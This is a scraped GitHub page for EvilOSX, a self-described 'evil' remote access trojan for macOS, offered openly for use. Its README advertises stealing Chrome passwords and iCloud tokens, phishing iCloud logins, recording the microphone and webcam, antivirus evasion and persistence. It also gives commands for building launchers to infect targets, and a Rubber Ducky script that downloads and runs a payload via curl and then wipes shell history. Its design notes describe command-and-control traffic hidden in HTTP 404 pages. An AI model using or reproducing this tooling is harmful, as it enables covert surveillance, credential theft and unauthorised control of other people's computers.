Skip to content
An evil RAT (Remote Administration Tool) for macOS / OS X.
Branch: master
Clone or download
Latest commit b159e2b Aug 17, 2018
Type Name Latest commit message Commit time
Failed to load latest commit information.
data Add logos and directories to git Jul 11, 2018
server Fix bytes error when executing modules Aug 17, 2018
.travis.yml Travis CI: Run automated tests on Python 2.7 and 3.7 Aug 1, 2018
Dockerfile Add Docker support Aug 12, 2018
LICENSE.txt Add back GUI support Aug 17, 2018
requirements.txt Add back GUI support Aug 17, 2018


An evil RAT (Remote Administration Tool) for macOS / OS X.

License Python Issues Build Status Contributing


  • Emulate a terminal instance
  • Simple extendable module system
  • No bot dependencies (pure python)
  • Undetected by anti-virus (OpenSSL AES-256 encrypted payloads)
  • Persistent
  • GUI and CLI support
  • Retrieve Chrome passwords
  • Retrieve iCloud tokens and contacts
  • Retrieve/monitor the clipboard
  • Retrieve browser history (Chrome and Safari)
  • Phish for iCloud passwords via iTunes
  • iTunes (iOS) backup enumeration
  • Record the microphone
  • Take a desktop screenshot or picture using the webcam
  • Attempt to get root via local privilege escalation

How To Use

# Clone or download this repository
$ git clone

# Go into the repository
$ cd EvilOSX

# Install dependencies required by the server
$ sudo pip install -r requirements.txt

# Start the GUI
$ python

# Lastly, run a built launcher on your target(s)

Warning: Because payloads are created unique to the target system (automatically by the server), the server must be running when any bot connects for the first time.

Advanced users

There's also a CLI for those who want to use this over SSH:

# Create a launcher to infect your target(s)
$ python --builder

# Start the CLI
$ python --cli --port 1337

# Lastly, run a built launcher on your target(s)




This project was created to be used with my Rubber Ducky, here's the simple script:

REM Download and execute EvilOSX @
REM See also:

DELAY 1000
STRING Termina
DELAY 1000
DELAY 1500

REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'

STRING cd /tmp; curl -s -o; python; history -cw; clear
  • It takes about 10 seconds to backdoor any unlocked Mac, which is...... nice
  • Terminal is spelt that way intentionally, on some systems spotlight won't find the terminal otherwise.
  • To bypass the keyboard setup assistant make sure you change the VID&PID which can be found here.
    Aluminum Keyboard (ISO) is probably the one you are looking for.


EvilOSX will be maintained under the Semantic Versioning guidelines as much as possible.
Server and bot releases will be numbered with the follow format:


And constructed with the following guidelines:

  • Breaking backward compatibility (with older bots) bumps the major
  • New additions without breaking backward compatibility bumps the minor
  • Bug fixes and misc changes bump the patch

For more information on SemVer, please visit

Design Notes

  • Infecting a machine is split up into three parts:
    • A launcher is run on the target machine whose only goal is to run the stager
    • The stager asks the server for a loader which handles how a payload will be loaded
    • The loader is given a uniquely encrypted payload and then sent back to the stager
  • The server hides it's communications by sending messages hidden in HTTP 404 error pages (from BlackHat's "Hiding In Plain Sight")
    • Command requests are retrieved from the server via a GET request
    • Command responses are sent to the server via a POST request
  • Modules take advantage of python's dynamic nature, they are simply sent over the network compressed with zlib, along with any configuration options
  • Since the bot only communicates with the server and never the other way around, the server has no way of knowing when a bot goes offline


Feel free to submit any issues or feature requests here.


For a simple guide on how to create modules click here.


  • The awesome Empire project
  • Shoutout to Patrick Wardle for his awesome talks, check out Objective-See
  • manwhoami for his projects: OSXChromeDecrypt, MMeTokenDecrypt, iCloudContacts
    (now deleted... let me know if you reappear)
  • The slowloris module is pretty much copied from PySlowLoris
  • urwid and this code which saved me a lot of time with the CLI
  • Logo created by motusora



You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.